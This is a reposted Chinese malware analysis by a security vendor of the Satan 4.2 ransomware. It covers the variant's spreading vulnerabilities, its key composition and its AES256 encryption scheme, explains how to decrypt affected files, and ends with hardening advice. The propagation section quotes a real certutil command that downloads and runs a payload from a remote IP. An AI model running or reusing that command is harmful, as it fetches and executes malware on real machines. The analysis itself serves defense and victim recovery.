【转载】撒旦(Satan 4.2)勒索病毒最新变种加解密分析

【转载】原文来自:https://bbs.kafan.cn/thread-2135007-1-1.html

1、概述
php

近日,腾讯御见威胁情报中心检测到一大批的服务器被入侵,入侵后被植入勒索病毒。通过分析确认,植入的勒索病毒为最新的Satan 4.2勒索病毒。


<ignore_js_op>
御见威胁情报中心长期跟踪撒旦(Satan)勒索病毒的变化,并屡次对外发布过撒旦(Satan)勒索病毒的分析文章。本次捕捉到的最新变种4.2版,传播方式跟以前的版本并未有太多的变化,可是加密部分发生了变化,会致使以前版本的解密工具失效。
经过技术分析确认,撒旦(Satan)勒索病毒4.2变种将密钥硬编码在病毒及加密后的文件中,所以被撒旦(Satan)勒索病毒加密的文件能够被解密。腾讯御见威胁中心已紧急更新了解密程序,供被勒索的用户恢复被加密的文件。受害用户只须启动腾讯电脑管家中的“文档守护者”,点击文档解密,便可根据提示修复被撒旦(Satan)勒索病毒加密的文档。


2、 传播分析
新捕捉到的样本,传播部分跟以前变化不大,依然集成了利用各类漏洞(包括永恒之蓝和其余服务器组件的漏洞)来进行攻击传播。攻击示意图以下:


<ignore_js_op>
撒旦(Satan)勒索病毒利用的漏洞工具包括:
l  永恒之蓝
l  JBoss反序列化漏洞(CVE-2017-12149)
l  JBoss默认配置漏洞(CVE-2010-0738)
l  Tomcat任意文件上传漏洞(CVE-2017-12615)
l  Tomcatweb管理后台弱口令爆破
l  WeblogicWLS 组件漏洞(CVE-2017-10271)
具体的扫描和入侵部分分析请参见以前的分析文章《撒旦(Satan)勒索蠕虫最新变种攻击方式解析》。
入侵成功后,会执行命令行下载病毒文件,继续扫描和入侵其余的机器并执行勒索病毒。执行的命令行为:
cmd.exe /c certutil.exe -urlcache -split -fhttp://45.77.175.225/cab/sts.exe c:/dbg.exe&&cmd.exe /c  c:/dbg.exe
3、 勒索病毒加解密分析
本次的变种变化较大的为勒索病毒的加密部分,所以本文着重介绍下最新变种的加密算法部分。
一、 加密密钥的组成变化
Satan 3.1 的加密密钥组成为:[HardWareID]+[STR]+[PUBLIC]
Satan 3.3 的加密密钥组成为:[HardWareID]+[HEX_STR]+[PUBLIC]
而最新的Satan 4.2的加密密钥组成为:[HardWareID]+[PUBLIC]+[HEX_STR]+[STR]
不只密钥的组成因子变多,且顺序跟以前也发生了改变。
新版的密钥组成:


<ignore_js_op>
其中,[HardWareID]和[PUBLIC]会被随机计算出来,而且会写在被加密的文件尾部。


<ignore_js_op>
而HEX_STR和STR则是硬编码在病毒的加密部分中:


<ignore_js_op>
二、 加密算法的变化
跟旧版撒旦(Satan)勒索病毒同样,最新4.2版的撒旦(Satan)勒索病毒为了加快加密速度,依然会对不一样大小和不一样文件类型的文件采起不一样的加密策略,不一样的是加密的方法再也不是前二分之1、前五分之一。最新的加密方式以下:
病毒会根据文件的后缀名进行彻底加密和不彻底加密,当文件后缀名符合规定的后缀名时采起彻底加密。相关后缀名以下:
"txt", "sql","zip", "php", "asp", "jsp","cpp", "ini", "aspx", "cs","py", "h", "vbs", "bat","conf", "sh", "inc", "e","c", "pl", "csv", "asm","doc", "docx", "xls", "xlsx","ppt"
当文件的后缀名不符合规定的文件名时,则根据文件大小进行加密:
1) 当文件大小大于100000000字节时,则采起每加密16字节后则随后的4x16字节不加密;
2) 当文件大小小于等于100000000字节时,则采起每加密16字节后随后的16字节不加密。
好比文件大小小于100000000字节的rar文件,被加密后的文件内容状况以下:


<ignore_js_op>
这种加密方式虽然加密的方法和旧版本不一样,可是一样作到了加密总体文件的二分之1、五分之一。
而最后采用的加密算法再也不是旧版本中使用的RC4加密算法,而是AES256 ECB加密。


<ignore_js_op>
加密后在目录下生成解密提示文本内容以下:
 
<ignore_js_op>
加密后的文件名变为[sicck@protonmail.com]文件名.sicck:


<ignore_js_op>
至于解密部分,因为AES256是对称加密算法,而密钥组成部分硬编码在病毒文件和加密后的文件中,所以撒旦(Satan)勒索病毒彻底能够被解密。解密方法只要从加密后文件的末尾提取HardWareID和PUBLIC,而后在病毒体中提取的HEX_STR和STR,组成AES256的key,便可用来解密加密后的文件。
而腾讯御点和腾讯电脑管家也更新了Satan的解密工具,使用腾讯电脑管家文档守护者中的文档解密功能便可解密成功。


<ignore_js_op>
如有中该勒索病毒的用户和没法使用该工具解密的用户,请联系咱们官方人员,协助进行解密。
<ignore_js_op>
 


4、安全建议
腾讯御见威胁情报中心提醒用户注意如下几点:
一、        服务器关闭没必要要的端口,方法可参考: https://guanjia.qq.com/web_clinic/s8/585.html
二、        使用腾讯御点(我的用户可以使用腾讯电脑管家)的漏洞修复功能,及时修复系统高危漏洞;
三、        服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
四、        推荐企业用户使用腾讯御点(下载地址: https://s.tencent.com/product/yd/index.html),我的用户使用腾讯电脑管家,拦截可能的病毒攻击。


<ignore_js_op>
相关文章
相关标签/搜索